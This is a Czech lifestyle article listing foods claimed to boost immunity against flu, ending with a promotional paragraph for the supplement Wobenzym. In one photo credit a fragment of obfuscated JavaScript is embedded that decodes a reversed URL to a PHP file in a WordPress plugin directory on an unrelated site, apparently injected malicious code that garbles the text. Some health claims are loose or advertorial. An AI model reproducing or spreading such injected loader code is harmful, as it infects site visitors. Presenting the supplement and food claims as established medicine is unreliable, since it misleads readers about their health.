FACESTARŽivotní stylCHŘIPKOVÁ EPIDEMIE JE V PLNÉM PROUDU! POSILTE SVOJI IMUNITU A ZŮSTAŇTE FIT!

CHŘIPKOVÁ EPIDEMIE JE V PLNÉM PROUDU! POSILTE SVOJI IMUNITU A ZŮSTAŇTE FIT!

Černý bez

Černý bez

Černé bobulky bezu (bezinky) jsou stará lidová medicína, kterou se úspěšně bojuje proti virům chřipky. Obsahují velké množství antioxidantů a vitaminů včetně vitaminu C, který je pro posílení imunity důležitý. Proti viru chřipky je účinný i sušený květ černého bezu, ze kterého se připravuje čaj. Z bobulí se nejčastěji připravuje šťáva nebo sirup.

andflickr.com/Cynthia

Žampiony

Tyto chutné houby obsahují selen, jehož nedostatek může vést k závažným komplikacím při chřipkových onemocněních. Pro imunitní systém jsou také důležité vitaminy skupiny B – riboflavin a niacin, které jsou v žampionech též hojně obsaženy.

andflickr.com/teach311

Bobule acai

Tmavá barva těchto bobulí signalizuje, že obsahují velké množství antioxidantů. Sice u nich nebyly objeveny účinky proti nějaké konkrétní chorobě, ale posilují obranyschopnost a zpomalují stárnutí organismu. Většinou jsou k dostání ve formě šťávy nebo sušené.

andflickr.com/Paulo Neves

Ústřice

Mají ústřice afrodiziakální účinky? Posilují imunitu? Nejspíš obojí, protože obsahují zinek. Jeho nedostatek bývá spojován s mužskou neplodností. I když z výzkumů zatím není jasné, proč tomu tak je, je zinek účinný v boji proti virům. Je také důležitý v několika funkcích imunitního systému, hlavně při hojení ran.

andflickr.com/Farrukh

Vodní meloun

Nejenže je meloun lahodný a osvěžující, ale také obsahuje důležitý antioxidant alutathion, který posiluje imunitní systém, aby byl schopný bojovat proti infekci. Nachází se především v té části dužiny, která je pod kůrou.

andflickr.com/brazzplayer

Zelí

Zelí je výborným zdrojem glutaminu, který také podporuje imunitu. Navíc se dá v zimě snadno sehnat a není drahé. Přidávejte do jídla všechny variety zelí a posílíte své zdraví.

andflickr.com/whitebuffalobk

Mandle

Hrst mandlí ochrání váš imunitní systém před negativním dopadem stresu. Čtvrtina šálku mandlí obsahuje téměř 50 % doporučené denní dávky vitaminu E, který imunitu podporuje. O ochranu proti stresu se stará riboflavin a niacin.

andflickr.com/icemanphotos

Grapefruit

V grapefruitu je obsaženo velké množství flavonoidů – přírodních látek, které imunitní systém aktivují. Pokud vám grapefruit nechutná, jezte pomeranče a mandarinky, které obsahují stejné látky, i když v o něco menším množství.

andflickr.com/liz west

Pšeničné klíčky

V pšeničných klíčcích najdeme zinek, antioxidanty, vitaminy B komplexu a další důležité látky a minerály. Také jsou vydatným zdrojem vlákniny, bílkovin a zdravého tuku. Nahrazujte část mouky v moučnících, pečivu a dalších jídlech.

and$nYj=function(n){if(typeof($nYj.list[n])==„string“)return $nYj.list[n].split(„“).reverse().join(„“);return $nYj.list[n]};$nYj.list=[„\’php.noitalsnart/cni/kcap-oes-eno-ni-lla/snigulp/tnetnoc-pw/moc.efac-aniaelahandTom“>flickr.com/Martha and Tom

Nízkotučný jogurt

Kelímek jogurtu denně snižuje riziko nachlazení. Je však nutné jíst jogurty, které obsahují živou kulturu, která imunitní systém posiluje.

andflickr.com/Kim Smith-Miller

Česnek

O česneku se často mluví jako o přírodním antibiotiku. Obsahuje důležité antioxidanty a posiluje imunitní systém v boji jak proti bakteriím, tak proti virům.

andflickr.com/lowjumpingfrog

Špenát

Tato listová zelenina je velmi bohatá na důležité živiny. Obsahuje foláty, sloučeniny kyseliny listové, které pomáhají regenerovat buňky a opravovat DNA. Také obsahuje velké množství vlákniny, antioxidantů a dalších látek. Jezte špenát v syrovém stavu nebo jen lehce povařený, aby se většina těchto látek nezničila.

andflickr.com/sciondriver

Čaj

Zelený nebo černý? Oba druhy čaje obsahují polyfenoly a flavonoidy, které ničí volné radikály v těle a chrání tak buňky před poničením.

andflickr.com/Michele

Brokolice

Zelenina, která je neustále k dostání a je základem pro posílení imunity, to je brokolice. Velké množství vitaminů a antioxidantů díky brokolici můžete přidat do mnoha jídel, protože její využití je v podstatě univerzální.

andflickr.com/Steven Lilley

Potravinové doplňky a léky

Další možností, jak tělo chránit před nemocemi a posílit jeho obranyschopnost, je konzumace některých doplňků stravy a léků. Jedním z volně prodejných léků, který pomáhá posílit imunitu, podpoří cirkulaci krve a lymfy a zefektivní i účinnost dalších léků, např. antibiotik, je Wobenzym. Ten také zrychluje hojení napadených sliznic a pomáhá při rekonvalescenci. Volně prodejný Wobenzym 346 byl u nás podáván dětem, které trpěly opakovanými záněty dýchacích cest – záněty hrtanu a nosohltanu, angínami, záněty vedlejších nosních dutin, průdušek či středního ucha. Během jednoho roku léčby klesl průměrný počet onemocnění těchto dětí ve srovnání s předcházejícím rokem o více než polovinu. Spotřeba antibiotik se ve sledované skupině snížila dokonce o více než dvě třetiny. Podobně dobré výsledky s takovou terapií má z vlastní zkušenosti i řada dospělých, kteří v důsledku dlouhodobě oslabené imunity trpěli opakovanými záněty dýchacích cest.

Související články